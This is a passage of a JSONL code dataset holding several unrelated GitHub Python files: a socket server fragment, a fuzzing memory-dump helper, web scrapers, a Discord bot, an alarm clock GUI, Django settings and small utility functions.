addr = s.accept()\r\n with conn:\r\n print('Connected by', addr)\r\n while True:\r\n data = conn.recv(1024)\r\n \r\n output=process_data(data)\r\n if not data:\r\n break\r\n #conn.sendall(data)\r\n conn.sendall(output)\r\nexcept: #if the port is already used and we want to restart it \r\n pass\r\n kill_port_proc(PORT)\r\n print(\"Killed the port process, run the script again\")\r\n\r\n","repo_name":"hmghaly/word_align","sub_path":"socket-server.py","file_name":"socket-server.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"71807567584","text":"\"\"\"\n\n Extract the data contained in a buffer and save to file\n\n Usefull to create a input file for afl-unicorn\n\n 2018 Giulio Ginesi\n\n\"\"\"\n\nimport gdb\nimport zlib\nimport datetime\nimport time\n\nBUFFER_ADDR = 0x76c6a008\nBUFFER_LEN = 0x200ee\n\ntry:\n buffer = read_memory(BUFFER_ADDR, BUFFER_LEN)\n print(\"Dumping buffer from 0x{0:x} of length 0x{1:x}\".format(BUFFER_ADDR, BUFFER_LEN))\nexcept:\n print(\"Error reading memory region!\")\n\n#compressed_buffer = zlib.compress(buffer)\n\ntimestamp = datetime.datetime.fromtimestamp(time.time()).strftime('%Y%m%d_%H%M%S')\ntry:\n out_name = 'input_'+timestamp+'.bin'\n out_file = open(out_name, 'wb')\n out_file.write(buffer)\n out_file.close()\n print(\"Saved file with name {}\".format(out_name))\nexcept:\n print(\"Error saving file!\")\n","repo_name":"blazef104/avionics-fuzzing","sub_path":"fuzzing/afl-unicorn/tools/extract_from_memory.py","file_name":"extract_from_memory.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"}
+{"seq_id":"27858809526","text":"import scrapy\nimport logging\nimport pytz\n\nfrom datetime import datetime\nfrom salescanner.crawling.spiders.utils.utils import Utils\nfrom salescanner.crawling.items import SalescannerItem\nfrom salescanner.crawling.spiders.utils.spider_indexor import SpiderIndexor\n\n\n@SpiderIndexor('olx')\nclass OLXAdsSpider(scrapy.Spider):\n\n MAX_NUMBER_OF_PAGES = 25\n name = 'olx_sales'\n\n def __init__(self, **kwargs):\n self.allowed_domains = ['olx.bg']\n self.start_urls = ['https://www.olx.bg/ads/']\n self.pages_processed = 0\n\n super().__init__(**kwargs)\n logging.getLogger('scrapy').setLevel(logging.WARNING)\n\n def parse(self, response):\n print(f'OLX LIST PAGE: {response.url}')\n offers_response = response.css('.offers')[1].css('.detailsLinkPromoted::attr(href), .detailsLink::attr(href)')\n offers_urls = set(offers_response.getall())\n\n for offer_url in offers_urls:\n split_url = offer_url.split('/')\n if 'job' in split_url or 'ad' not in split_url:\n continue\n\n if 'd' in split_url:\n split_url.remove('d')\n offer_url = '/'.join(split_url)\n\n yield scrapy.Request(offer_url, callback=self.parse_details_page)\n self.pages_processed += 1\n\n next_page_url = response.css('.next > a.pageNextPrev::attr(href)').get()\n if next_page_url is not None and self.pages_processed < OLXAdsSpider.MAX_NUMBER_OF_PAGES:\n yield scrapy.Request(next_page_url, callback=self.parse, dont_filter=True)\n \n\n def parse_details_page(self, response):\n split_url = response.url.split('/')\n if 'job' in split_url or 'ad' not in split_url:\n return\n\n image_url = response.css('.descgallery__image img.bigImage::attr(src)').get()\n title = response.css('.offer-titlebox > h1::text').get()\n price = response.css('.offer-titlebox__price > .pricelabel > strong::text').get()\n description = response.css('.descriptioncontent > #textContent *::text').getall()\n description = ' '.join([line.strip() for line in description])\n upload_datetime = response.css('.offer-bottombar__items .offer-bottombar__item em strong::text').get()\n \n ad_item = SalescannerItem()\n ad_item['url'] = response.url\n ad_item['title'] = title.strip() if title else title\n ad_item['price'] = price.strip() if price else price\n ad_item['image_url'] = image_url\n ad_item['description'] = description\n ad_item['upload_time'] = self.parse_upload_datetime(upload_datetime)\n yield ad_item\n\n def parse_upload_datetime(self, datetime_str):\n if datetime_str is None:\n return None\n\n datetime_str = datetime_str.strip()\n datetime_str = datetime_str[2:].split(',')\n time_portion = datetime_str[0].split(':')\n date_portion = datetime_str[1].strip().split(' ')\n\n datetime_obj = datetime(\n int(date_portion[2]),\n Utils.month_to_number(date_portion[1]),\n int(date_portion[0]),\n int(time_portion[0]),\n int(time_portion[1]))\n return self._datetime_to_timestamp(datetime_obj)\n \n def _datetime_to_timestamp(self, datetime_obj):\n timezone = pytz.timezone('Europe/Sofia')\n datetime_obj = timezone.localize(datetime_obj)\n\n return int(datetime_obj.timestamp() * 1000)\n","repo_name":"ZdravkoHvarlingov/sale-scanner","sub_path":"salescanner/crawling/spiders/olx_ads_spider.py","file_name":"olx_ads_spider.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"30420574537","text":"from __future__ import annotations\n\nimport asyncio\nimport hikari\nimport lightbulb\nimport logging\nimport miru\nimport config\nimport solis.helper.riddle\nfrom solis.views.view import ButtonView\nfrom __init__ import __version__\nfrom aiohttp import ClientSession\nfrom pytz import utc\nfrom apscheduler.schedulers.asyncio import AsyncIOScheduler\n\nis_playing_riddle = False\n\n\ndef setup() -> None:\n logging.info(\"Running bot setup...\")\n\n\nbot = lightbulb.BotApp(\n token=config.token,\n default_enabled_guilds=config.DEFAULT_GUILD_ID,\n owner_ids=config.OWNERS_ID,\n help_slash_command=True,\n case_insensitive_prefix_commands=True,\n prefix=\"!\",\n intents=hikari.Intents.ALL\n\n)\nbot.d.scheduler = AsyncIOScheduler()\nbot.d.scheduler.configure(timezome=utc)\nbot.load_extensions_from(\"../solis/extensions\")\nmiru.load(bot)\n\n\n@bot.listen(hikari.StartingEvent)\nasync def on_starting(event: hikari.StartingEvent) -> None:\n bot.d.scheduler.start()\n bot.d.session = ClientSession(trust_env=True)\n logging.info(\"AIOHTTP session started\")\n\n\n@bot.listen(hikari.StartedEvent)\nasync def on_started(event: hikari.StartedEvent) -> None:\n await bot.rest.create_message(\n config.TEST_CHANNEL_ID,\n f\"Solis is now online! (Version {__version__})\"\n )\n\n\n@bot.listen(hikari.StoppingEvent)\nasync def on_stopping(event: hikari.StoppingEvent) -> None:\n await bot.d.session.close()\n logging.info(\"AIOHTTP session closed\")\n bot.d.scheduler.shutdown()\n await bot.rest.create_message(\n config.TEST_CHANNEL_ID,\n f\"Solis is shutting down. (Version {__version__})\"\n )\n\n\n@bot.listen(hikari.DMMessageCreateEvent)\nasync def on_pm_message_create(event: hikari.DMMessageCreateEvent) -> None:\n if event.message.author.is_bot:\n return\n\n await event.message.respond(\n f\"You need to DM <@{config.BOT_OWNER}> to send a message to moderators.\"\n )\n\n\n@bot.command\n@lightbulb.command('ping', 'say pong!')\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def ping(ctx):\n await ctx.respond(\n f\"Pong! DWSP latency: {ctx.bot.heartbeat_latency * 1_000:,.0f} ms.\")\n\n\n@bot.command\n@lightbulb.command('button', 'button test')\n@lightbulb.implements(lightbulb.SlashCommand)\nasync def button(ctx: lightbulb.SlashContext):\n view = ButtonView(timeout=60)\n message = await ctx.respond(\"Button test\", components=view.build())\n message = await message\n view.start(message)\n await view.wait()\n print(\"All done.\")\n\n\ndef run() -> None:\n setup()\n bot.run(\n activity=hikari.Activity(\n name=f\"/help | Version {__version__}\",\n type=hikari.ActivityType.WATCHING\n )\n )\n\n\n# Bot is listening to the specified guilds\n@bot.listen(hikari.GuildMessageCreateEvent)\nasync def on_guild_message_event(event: hikari.GuildMessageCreateEvent) -> None:\n event_author = event.message.author\n message = event.message\n\n global is_playing_riddle\n if event_author.is_bot or not message.content:\n return\n\n if any(e in message.content.lower().split(\" \") or i in message.content.lower()\n for e in {\"gm\", \"gm!\", \"goodmorning\"}\n for i in {\"good morning\", \"morning everyone\"}):\n await message.respond(\"Good morning! \" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n\n if any(e in message.content.lower().split(\" \") or i in message.content.lower()\n for e in {\"gn\", \"gn!\", \"goodnight\"}\n for i in {\"good night\", \"night everyone\"}):\n await message.respond(\"Good night! 
\" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n\n if any(e in message.content.lower().split(\" \") for e in\n {\"riddle\", \"teaser\", \"riddles\", \"teasers\"}) and is_playing_riddle is False \\\n and message.content != \"!fun riddle\" and message.content != \"/fun riddle\":\n resp = await message.respond(\"Did someone mention a riddle? :eyes: \" + event_author.mention,\n user_mentions=True,\n mentions_reply=True)\n await resp.add_reaction(\"❌\")\n await resp.add_reaction(\"✅\")\n is_playing_riddle = True\n try:\n reaction = await bot.wait_for(\n hikari.ReactionAddEvent,\n timeout=10,\n predicate=lambda new_event:\n isinstance(new_event, hikari.ReactionEvent)\n and new_event.user_id == event_author.id\n and str(new_event.emoji_name) in {\"❌\", \"✅\"}\n )\n if reaction.emoji_name == \"✅\":\n await resp.remove_reaction(emoji=\"❌\")\n await solis.helper.riddle.on_riddle(message)\n is_playing_riddle = False\n else:\n await resp.remove_reaction(emoji=\"✅\")\n await resp.edit(\"Okay maybe next time!\")\n is_playing_riddle = False\n\n except asyncio.TimeoutError:\n is_playing_riddle = False\n await message.respond(\"The riddle timed out :c\")\n\n\n@bot.listen(lightbulb.CommandErrorEvent)\nasync def on_command_error(event: lightbulb.CommandErrorEvent) -> None:\n exc = getattr(event.exception, \"__cause__\", event.exception)\n\n if isinstance(exc, lightbulb.NotOwner):\n await event.context.respond(\"You need to be an owner to do that.\")\n return\n raise event.exception\n\n\n","repo_name":"Memo-Aldu/solis","sub_path":"solis/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"20412268303","text":"\"\"\"\nAssumptions:\n None\n\nAlgorithm:\n 1. divisor = 10^(number of digits - 1)\n 2. While n != 0\n a. first = (int) n / divisor\n b. last = (int) n % 10\n c. if head != tail:\n return False\n d. remove first and last element from n\n e. divide divisor by 100\n 3. return True\n\nTime complexity : O(log(n))\n\nSpace complexity : O(1)\n\"\"\"\n\nfrom math import log10\n\n\ndef is_palindrome(n: int):\n \"\"\"\n To check whether a integer is a palindrome or not\n :param n: integer\n :return: Boolean\n \"\"\"\n digits = int(log10(n)) # to get number of digits - 1\n divisor = 10 ** digits\n\n while n is not 0:\n\n # to get the first element\n head = n // divisor\n\n # to get the last element\n tail = n % 10\n\n if head is not tail:\n return False\n\n # removing head element from n\n n %= divisor\n\n # removing tail element from n\n n //= 10\n\n # reducing divisor by 100 as two elements have been removed\n divisor //= 100\n\n return True\n","repo_name":"Pranjulcr7/Boodl-Tech_solutions","sub_path":"Problem2.py","file_name":"Problem2.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"26731667338","text":"# https://www.youtube.com/watch?v=AShHJdSIxkY&ab_channel=MarkJay\n\nimport pyaudio\nimport struct\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nCHUNK = 1024 * 250\nFORMAT = pyaudio.paInt16\nCHANNELS = 2\nRATE = 44100\n\np = pyaudio.PyAudio()\n\nstream = p.open(format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=True,\n frames_per_buffer=CHUNK)\n\nraw_data = stream.read(CHUNK)\ndata = np.frombuffer(raw_data, dtype=np.int16)\nplt.plot(data)\nplt.show()\n","repo_name":"animesh-chouhan/ledstrip-sound-reactive","sub_path":"capture_test.py","file_name":"capture_test.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"36082785128","text":"# coding: utf-8\nfrom datetime import datetime\n\nfrom scrapy import Spider, Request\nfrom dateutil import parser\nfrom pytz import timezone\nfrom w3lib.url import add_or_replace_parameter\n\nfrom pollution_app.pollution import Kind\nfrom pollution_app.items import AppItem\nfrom pollution_app.settings import SCRAPER_TIMEZONE\n\n\nclass EnglandSpider(Spider):\n name = u\"gb_england\"\n tz = u\"GMT\"\n source = u\"http://www.airqualityengland.co.uk\"\n\n def start_requests(self):\n codes = (u\"AY1\", u\"BAR6\", u\"BAR9\", u\"HB010\", u\"HB011\", u\"BAI2\", u\"WIL1\", u\"BUR2\", u\"BUR1\", u\"WIL8\", u\"WIL5\",\n u\"NEW2\", u\"CAM3\", u\"CAM5\", u\"CAM4\", u\"CAM1\", u\"CRL2\", u\"HB013\", u\"WIL3\", u\"HB012\", u\"EWE2\", u\"FAR2\",\n u\"GA1\", u\"GA2\", u\"GA3\", u\"GIRT\", u\"FAR1\", u\"T55\", u\"LHR2\", u\"T54\", u\"HEN\", u\"HB008\", u\"HB009\", u\"HI1\",\n u\"SIPS\", u\"HB002\", u\"HB003\", u\"HS5\", u\"HS4\", u\"HS2\", u\"HS9\", u\"HS8\", u\"HS7\", u\"HS6\", u\"BN2\", u\"HIL1\",\n u\"HIL4\", u\"HIL5\", u\"HI3\", u\"HB006\", u\"HB007\", u\"MAN1\", u\"MAN7\", u\"MAHG\", u\"WIL7\", u\"NUL1\", u\"OX6\",\n u\"OX3\", u\"REA2\", u\"REA4\", u\"RED3\", u\"IMP\", u\"ORCH\", u\"M60\", u\"WIL4\", u\"CW\", u\"SLH7\", u\"SLH3\", u\"SLH6\",\n u\"SLH5\", u\"SLH8\", u\"SLH9\", u\"SLH4\", u\"GX\", u\"SHOL\", u\"MONK\", u\"HB005\", u\"STK7\", u\"STK5\", u\"SUN2\",\n u\"SUN4\", u\"BN1\", u\"TAM1\", u\"TAME\", u\"GOS1\", u\"TRAF\", u\"TRF2\", u\"WD1\", u\"WL4\", u\"WL1\", u\"WL5\", u\"HB004\",\n u\"WAT\", u\"HB001\", u\"WID2\", u\"WID1\", u\"WIG7\", u\"NEW3\", u\"WYA4\", u\"WSTO\", u\"YK10\", u\"YK11\", u\"YK16\",\n u\"YK7\", u\"YK13\", u\"YK8\", u\"YK9\", u\"YK15\", u\"YK018\", u\"BAR3\", u\"BPLE\", u\"BATH\", u\"BIL\", u\"BBRD\",\n u\"BIRR\", u\"AGRN\", u\"BIR1\", u\"BLAR\", u\"BLC2\", u\"BORN\", u\"BDMA\", u\"BRT3\", u\"BRS8\", u\"BURW\", u\"CAM\",\n u\"CANK\", u\"CANT\", u\"CARL\", u\"MACK\", u\"CHAT\", u\"CHLG\", u\"CHS7\", u\"CHBO\", u\"CHBR\", u\"COAL\", u\"DCST\",\n u\"EB\", u\"EX\", u\"GLAZ\", u\"HM\", u\"HONI\", u\"HUL2\", u\"HULR\", u\"LB\", u\"LEAM\", u\"LEAR\", u\"LEED\", u\"LED6\",\n u\"LEIR\", u\"LECU\", u\"LEOM\", u\"LIN3\", u\"LVP\", u\"LH\", u\"LUTR\", u\"MAN3\", u\"MKTH\", u\"MID\", u\"NEWC\", u\"NCA3\",\n u\"NTN3\", u\"NO12\", u\"NOTT\", u\"NWBV\", u\"BOLD\", u\"OX\", u\"OX8\", u\"PLYM\", u\"PMTH\", u\"PRES\", u\"REA5\",\n u\"ROCH\", u\"ECCL\", u\"SASH\", u\"SDY\", u\"SCN2\", u\"SHBR\", u\"SHDG\", u\"SHE\", u\"SIB\", u\"SA33\", u\"SOUT\",\n u\"SEND\", u\"SHLW\", u\"OSY\", u\"SOTR\", u\"EAGL\", u\"STKR\", u\"STOK\", u\"STOR\", u\"SUNR\", u\"WAL4\", u\"WAR\",\n u\"WEYB\", u\"WFEN\", u\"WSMR\", u\"WIG5\", u\"TRAN\", u\"WTHG\", u\"YW\")\n\n # codes = (u\"LEIR\",)\n url = u\"http://www.airqualityengland.co.uk/site/latest\"\n for code_value in codes:\n url = add_or_replace_parameter(url, u\"site_id\", code_value)\n\n yield Request(\n url=url,\n callback=self.parse,\n meta={u\"code\": code_value}\n )\n\n def get_station_data(self, resp):\n data_time = resp.xpath(u'//*[@id=\"pageSubArea\"]/div/p[1]/text()').re(u\"(\\d\\d\\/\\d\\d\\/\\d\\d\\d\\d\\s\\d\\d:\\d\\d)\")\n data_time = parser.parse(data_time[0]).replace(tzinfo=timezone(self.tz)) if data_time else None\n\n table = resp.xpath(u'//*[@id=\"pageSubArea\"]/div/table/tr')[1:]\n\n station_data = dict()\n for row in table:\n pollutant_name = row.xpath(u'td[1]/text()').extract_first().split(u\" (\")[0]\n pollutant_name_ind = row.xpath(u'td[1]/sub/text()').extract_first() if 
row.xpath(u'td[1]/sub/text()').extract_first() != None else u\"\"\n pollutant_name_time = row.xpath(u\"td[last()]/text()\").extract_first()\n\n pollutant_name = (\n u\" \".join((pollutant_name, pollutant_name_ind, pollutant_name_time))\n ).replace(u\" \", u\" \")\n\n pollutant_value = row.xpath(u\"td[last() - 1]/text()\").extract_first()\n\n if pollutant_value is not None:\n if u\"\\xa0\" in pollutant_value:\n pollutant_value = pollutant_value.split(u\"\\xa0\")[0]\n else:\n pollutant_value = pollutant_value.split(u\" \")[0]\n\n pollutant_value = pollutant_value if pollutant_value != u\"No\" else None\n\n pollutant = Kind(self.name).get_dict(r_key=pollutant_name, r_val=pollutant_value)\n if pollutant:\n station_data[pollutant[u\"key\"]] = pollutant[u\"val\"]\n\n if station_data:\n items = AppItem()\n items[u\"scrap_time\"] = datetime.now(tz=timezone(SCRAPER_TIMEZONE))\n items[u\"data_time\"] = data_time\n items[u\"data_value\"] = station_data\n items[u\"source\"] = self.source\n items[u\"source_id\"] = resp.meta[u\"code\"]\n\n yield items\n\n def parse(self, response):\n for el in self.get_station_data(response):\n yield el\n\n","repo_name":"tillroy/AmbienceData","sub_path":"pollution_app_root/pollution_app/spiders/gb_england.py","file_name":"gb_england.py","file_ext":"py","file_size_in_byte":4800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"5586559264","text":"'''\nAlarm Clock GUI Client\n\nRequirements:\nvlc: pip install vlc\nmutagen: pip install mutagen\npython-crontab: pip install python-crontab\n'''\n\nimport sys\nimport string\nimport vlc\nimport os\nimport getpass\nfrom time import sleep\nfrom mutagen.mp3 import MP3\nfrom crontab import CronTab\nfrom tkinter import *\n\n\nusername = getpass.getuser()\nscript_path = os.path.abspath(sys.argv[0])\n\n\nclass Window(Frame):\n\t\n def __init__(self, master=None):\n Frame.__init__(self, master)\n self.master=master\n self.init_window()\n\n def init_window(self):\n self.master.title('Alarm')\n self.pack(fill=BOTH, expand=1)\n\n self.columnconfigure(1, weight=1)\n self.columnconfigure(3, pad=7)\n self.rowconfigure(3, weight=1)\n self.rowconfigure(5, pad=7)\n \n head_label = Label(self, text=\"Alarm Clock\")\n head_label.grid(padx=5, pady=5)\n\n scheduled_tasks_list_box = Listbox(self)\n scheduled_tasks_list_box.grid(row=1, column=0, columnspan=2, rowspan=4, padx=5, sticky=E+W+S+N)\n self.show_scheduled_alarms(scheduled_tasks_list_box)\n scheduled_tasks_list_box.bind(\"<>\", self.onScheduledAlarmSelect)\n\n #scrollbar_scheduled_tasks_list_box = Scrollbar(self.master, orient=\"horizontal\")\n #scrollbar_scheduled_tasks_list_box.config(command=scheduled_tasks_list_box.xview)\n #scrollbar_scheduled_tasks_list_box.pack(side=\"bottom\", fill=\"x\")\n #scheduled_tasks_list_box.config(xscrollcommand=Scrollbar.set)\n\n self.var=StringVar()\n\n\n ringnow_button = Button(self, text=\"Ring Now\", command=self.ringnow)\n ringnow_button.grid(row=1, column=3)\n \n delete_scheduled_alarm_button = Button(self, text=\"Delete Scheduled Alarm\", command= lambda: self.delete_scheduled_alarm(scheduled_tasks_list_box))\n delete_scheduled_alarm_button.grid(row=2, column=3)\n\n def show_scheduled_alarms(self, scheduled_tasks_list_box):\n scheduled_tasks_list_box.delete(0, END)\n cron_task = CronTab(user=username)\n for job in cron_task:\n if job.comment.startswith('alarm-clock-'):\n scheduled_tasks_list_box.insert(END, job)\n\n def onScheduledAlarmSelect(self, val):\n sender=val.widget\n idx=sender.curselection()\n value=sender.get(idx) \n self.var.set(value)\n\n def ringnow(self):\n alarm_file = vlc.MediaPlayer(os.path.join(os.path.dirname(script_path), \"alarm.mp3\"))\n alarm_file_length = MP3(os.path.join(os.path.dirname(script_path), \"alarm.mp3\")).info.length\n alarm_file.play()\n\n def delete_scheduled_alarm(self, scheduled_tasks_list_box):\n #import pdb\n #pdb.set_trace()\n cron_task = CronTab(user=username)\n idno = self.var.get()\n print(idno)\n for job in cron_task:\n if job.comment=='alarm-clock-'+idno:\n cron_task.remove(job)\n cron_task.write()\n self.show_scheduled_alarms(scheduled_tasks_list_box)\n\nroot = Tk()\nroot.geometry(\"400x300\")\napp = Window(root)\nroot.mainloop()","repo_name":"siddhantkhandelwal/Python-Scripts","sub_path":"alarm-clock/alarm-clock-gui.py","file_name":"alarm-clock-gui.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"37409393595","text":"#-*- coding:utf8 -*-\n\nimport os\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '_*b844))&omdj+7)zx#1$%c4a$*cv61a)d3t=a!mr0^+ylxh2&'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nfrom constant import svr_config as Conf\n\n\n#========================Celery Settings==============\nCELERY_CONF = Conf['CELERY']\nBROKER_URL = CELERY_CONF['broker_url']\n#CELERY_RESULT_BACKEND = \"redis://:foo@localhost:6379/15\"\nCELERY_RESULT_BACKEND = CELERY_CONF['celery_result_backend']\n\nALLOWED_HOSTS = ['*']\n\n\n# Application definition\n\nDEFAULT_APPS = [\n # 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n]\n\nCUSTOM_APPS = [\n 'demo',\n 'accounts',\n 'utils',\n 'blog',\n 'middleware',\n 'cache',\n 'base'\n]\n\nTHIRD_APPS = [\n 'rest_framework',\n 'corsheaders',\n 'guardian'\n]\n\nINSTALLED_APPS = DEFAULT_APPS + CUSTOM_APPS + THIRD_APPS\n\nMIDDLEWARE_CLASSES = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware', #跨域\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'devsysproj.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'devsysproj.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/1.9/ref/settings/#databases\nif Conf['DB']['db_type'] == 'sqlite':\n DATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n }\nelse:\n DB_CONF = Conf['DB']\n DATABASES = {\n 'default': {\n 'ENGINE': DB_CONF['engine'],\n 'NAME': DB_CONF['dbname'],\n 'USER': DB_CONF['user'],\n 'PASSWORD': DB_CONF['password'],\n 'HOST': DB_CONF['host'],\n 'PORT': DB_CONF['port']\n }\n }\n\n# Password validation\n# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.9/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, 
JavaScript, Images)\n# https://docs.djangoproject.com/en/1.9/howto/static-files/\n\nSTATIC_URL = '/static/'\n\n#=================REST_FRAME_WORK SETTINGS=============\nREST_FRAMEWORK = {\n\n 'DEFAULT_RENDERER_CLASSES': (\n 'rest_framework.renderers.JSONRenderer',\n ),\n\n 'DEFAULT_AUTHENTICATION_CLASSES':(\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework.authentication.BasicAuthentication'\n )\n}\n\n\n#==============CORS SETTINGS===================\nCORS_ORIGIN_ALLOW_ALL = False\n\nCORS_ALLOW_HEADERS = (\n 'accept',\n 'accept-encoding',\n 'authorization',\n 'content-type',\n 'dnt',\n 'origin',\n 'user-agent',\n 'x-csrftoken',\n 'x-requested-with',\n 'Access-Control-Allow-Origin'\n)\n\nCORS_ORIGIN_WHITELIST = (\n 'google.com',\n 'hostname.example.com',\n 'localhost:8000',\n '127.0.0.1:8080',\n '127.0.0.1:8000',\n '0.0.0.0:8080',\n 'localhost:8080',\n '192.168.1.217:8080'\n)\n\nCORS_ALLOW_CREDENTIALS = True\n\nCORS_ALLOW_METHODS = (\n 'DELETE',\n 'GET',\n 'OPTIONS',\n 'PATCH',\n 'POST',\n 'PUT',\n)\n\nCUR_PATH = os.getcwd()\n\n#=================Logging Settings===============\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'handlers': {\n 'file': {\n 'level': 'INFO',\n 'class': 'logging.FileHandler',\n 'filename': '{cur_path}/log/debug.log'.format(cur_path=CUR_PATH),\n },\n },\n 'loggers': {\n 'django': {\n 'handlers': ['file'],\n 'level': 'INFO',\n 'propagate': True,\n },\n },\n}\n\n#=========Email Settings==========\nEMAIL_CONF = Conf['EMAIL']\nEMAIL_HOST = EMAIL_CONF['email_host']\nEMAIL_HOST_USER = EMAIL_CONF['email_host_user']# 用户\nEMAIL_HOST_PASSWORD = EMAIL_CONF['email_host_password'] # 密码\nEMAIL_SUBJECT_PREFIX = u'[重置密码]' # ���邮件Subject-line前缀,默认是'[django]'\nEMAIL_USE_TLS = False #与SMTP服务器通信时,是否启动TLS链接(安全链接)。默认是false\n\n\n#============Memcached Settings=======\nMEMACHED_CONF = Conf['MEMCACHED']\nMEMACHED_CONF_HOST = MEMACHED_CONF['location']\nCACHES = {\n 'default': {\n 'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',\n 'LOCATION': MEMACHED_CONF_HOST,\n }\n}\n\nAUTHENTICATION_BACKENDS = [\n 'django.contrib.auth.backends.ModelBackend', # default\n 'guardian.backends.ObjectPermissionBackend',\n]\n","repo_name":"EroticMango/devsys","sub_path":"devsysproj/devsysproj/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":6168,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"}
+{"seq_id":"2237097531","text":"def DruhaNeboPata(a,b,c,d,e,f):\n \n # v nejhorsim pripade 7\n ####################\n # Použijeme algoritmus na určení druheho nejtezsiho:\n # nalezneme nejtezsiho pomoci peti porovnani\n # na druheho nejtezsiho mame dva kandidaty, bud u a e/f, nebo z a x/y a a/b/c/d\n # celkem 6 nebo 7 porovnani, v nejhoršim případě 7, když je u težší než z.\n # p\n # / \\\n # u \\\n # / \\ \\\n # / \\ \\\n # x y z\n # / \\ / \\ / \\\n # a b c d e f\n # Využití možnosti vrátit i druhý nejlehčí jsem zatím nenalezl...\n\n # JeTezsi = lambda x, y: x > y\n\n vratTezsi = lambda i, j: i if JeTezsi(i ,j) else j\n\n x = vratTezsi(a, b)\n y = vratTezsi(c, d) \n z = vratTezsi(e, f)\n u = vratTezsi(x, y)\n if vratTezsi(u, z) == u:\n if u == x:\n return vratTezsi(y, z)\n else: # u == y\n return vratTezsi(x, z)\n else:\n if z == e:\n return vratTezsi(f, u)\n else:\n return vratTezsi(u, e)\n\n\n# print(DruhaNeboPata(*map(int, input().split())))","repo_name":"zdenecek/mff_stuff","sub_path":"programovani_1/cviceni_holan/secondmax.py","file_name":"secondmax.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"cs","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
